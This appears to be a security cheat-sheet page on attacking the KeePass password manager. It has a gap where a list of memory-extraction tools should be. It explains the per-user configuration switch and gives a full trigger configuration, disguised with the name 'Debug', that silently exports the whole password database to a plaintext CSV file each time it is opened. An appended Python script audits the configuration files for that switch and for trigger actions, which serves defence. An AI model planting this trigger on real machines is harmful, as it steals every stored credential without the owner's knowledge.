KeePass
For KeePass 2.x it is possible to extract passwords from memory using either of the following tools:
Furthermore, if the following is present in C:\Program Files (x86)\KeePass Password Safe 2\KeePass.config.xml:
<?xml version="1.0" encoding="utf-8"?>
<Configuration xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
<Meta>
<PreferUserConfiguration>true</PreferUserConfiguration>
</Meta>
</Configuration>
This means that the local config will be used, stored in C:\Users\USERNAME\AppData\Roaming\KeePass\KeePass.config.xml
It is possible to add a trigger to stealthily extract the DB content when the database is opened:
<?xml version="1.0" encoding="utf-8"?>
<Configuration xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
<TriggerSystem>
<Triggers>
<Trigger>
<Guid>6KWCIs4ii0u15lY+Ps59Cg==</Guid>
<Name>Debug</Name>
<Events>
<Event>
<TypeGuid>5f8TBoW4QYm5BvaeKztApw==</TypeGuid>
<Parameters>
<Parameter>0</Parameter>
<Parameter />
</Parameters>
</Event>
</Events>
<Conditions />
<Actions>
<Action>
<TypeGuid>D5prW87VRr65NO2xP5RIIg==</TypeGuid>
<Parameters>
<Parameter>C:/Windows/Tasks\{DB_BASENAME}.csv</Parameter>
<Parameter>KeePass CSV (1.x)</Parameter>
<Parameter />
<Parameter />
</Parameters>
</Action>
</Actions>
</Trigger>
</Triggers>
</TriggerSystem>
</Configuration>
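To check a host for this, the two configuration files named above can be audited for the PreferUserConfiguration switch and for any trigger actions. The following is an added example, not part of the original page or of KeePass itself: the function name and the sample documents are constructed for illustration, and the only action TypeGuid it recognises is the one copied from the trigger shown above.

```python
import xml.etree.ElementTree as ET

# Action TypeGuid copied from the trigger on this page (its export action).
EXPORT_ACTION_GUID = "D5prW87VRr65NO2xP5RIIg=="

def audit_keepass_config(xml_text):
    """Return findings for one KeePass.config.xml document given as text."""
    root = ET.fromstring(xml_text)
    findings = []
    # The global file can hand control to the per-user file in %APPDATA%.
    prefer = root.findtext("./Meta/PreferUserConfiguration") or ""
    if prefer.strip().lower() == "true":
        findings.append({"kind": "prefer_user_config"})
    # Report every trigger action; mark the export action seen on this page.
    for trig in root.findall("./TriggerSystem/Triggers/Trigger"):
        name = (trig.findtext("Name") or "").strip()
        for action in trig.findall("./Actions/Action"):
            guid = (action.findtext("TypeGuid") or "").strip()
            params = [p.text or "" for p in action.findall("./Parameters/Parameter")]
            kind = "export_trigger" if guid == EXPORT_ACTION_GUID else "trigger_action"
            findings.append({"kind": kind, "trigger": name,
                             "action_guid": guid, "params": params})
    return findings

# Constructed sample inputs, shaped like the two files shown on this page.
GLOBAL_SAMPLE = """<?xml version="1.0" encoding="utf-8"?>
<Configuration>
  <Meta><PreferUserConfiguration>true</PreferUserConfiguration></Meta>
</Configuration>"""

USER_SAMPLE = """<?xml version="1.0" encoding="utf-8"?>
<Configuration>
  <TriggerSystem><Triggers><Trigger>
    <Name>Debug</Name>
    <Actions><Action>
      <TypeGuid>D5prW87VRr65NO2xP5RIIg==</TypeGuid>
      <Parameters>
        <Parameter>C:/Windows/Tasks\\{DB_BASENAME}.csv</Parameter>
        <Parameter>KeePass CSV (1.x)</Parameter>
      </Parameters>
    </Action></Actions>
  </Trigger></Triggers></TriggerSystem>
</Configuration>"""

if __name__ == "__main__":
    for label, text in (("global", GLOBAL_SAMPLE), ("user", USER_SAMPLE)):
        for finding in audit_keepass_config(text):
            print(label, finding)
```

Any trigger action reported from a per-user configuration that the user did not create is worth reviewing, whether or not it matches the export GUID.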